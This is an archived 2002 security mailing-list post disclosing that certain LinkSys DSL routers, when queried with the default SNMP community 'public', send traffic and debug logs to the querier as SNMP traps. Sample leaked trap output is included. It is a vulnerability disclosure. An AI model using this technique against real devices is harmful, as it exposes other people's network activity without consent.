OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Matthew S. Hallacy (poptixtechmonkeys.org)
Date: Sun Jan 06 2002 - 06:55:17 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Howdy.

    LinkSys DSL 'routers' have some serious information leakage, and potention DDoS
    usage. The following models have been confirmed as having this problem:
    BEFN2PS4 (EtherFast Cable/DSL Router & Voice with 4-Port Switch)
    BEFSR81 (EtherFast Cable/DSL Router with 8-Port Switch)

    Querying these devices with the default community of 'public' causes them to set
    the address that queried as their snmptrap host, dumping traffic such as the
    following to that address:

    Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 24.254.60.13[110]."
    Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 216.120.8.23[5632]."
    Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 216.120.8.3[5632]."
    Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 216.120.8.4[5632]."
    Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 216.120.8.5[5632]."
    Enterprise Specific Trap (1) Uptime: 2 days, 6:04:38.11, enterprises.3955.1.1.0 = "-->[U]Send OP: ^ps_status_q 15049C0DFC9B03166D55EA30474D04FB 9218583272 a .."
    Enterprise Specific Trap (1) Uptime: 2 days, 6:04:38.11, enterprises.3955.1.1.0 = "<--[U]Recv __: ^ps_status_r.15049C0DFC9B03166D55EA30474D04FB.\"\".0.."

    It looks like a combination of debugging information as well as traffic logging,
    many customers never use the configuration page, let alone change the SNMP
    communities. To make the matter worse, LinkSys refuses to distribute an MIB
    for the device, which is not suprising considering the SNMP implementation
    on the device is rather broken (it goes into a continious loop).

    LinkSys is routing all messages regarding SNMP to /dev/null

                            Have a nice day.
                            Matthew S. Hallacy 

    --

    -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org

    iD8DBQE8OEk0XbLQQwGTggMRArzQAJwM0m2nqAksdB79845QtXW4/uTfNwCgxp68 25wsxUpm0IQnOM/pqIxR4Ww= =tmmB -----END PGP SIGNATURE-----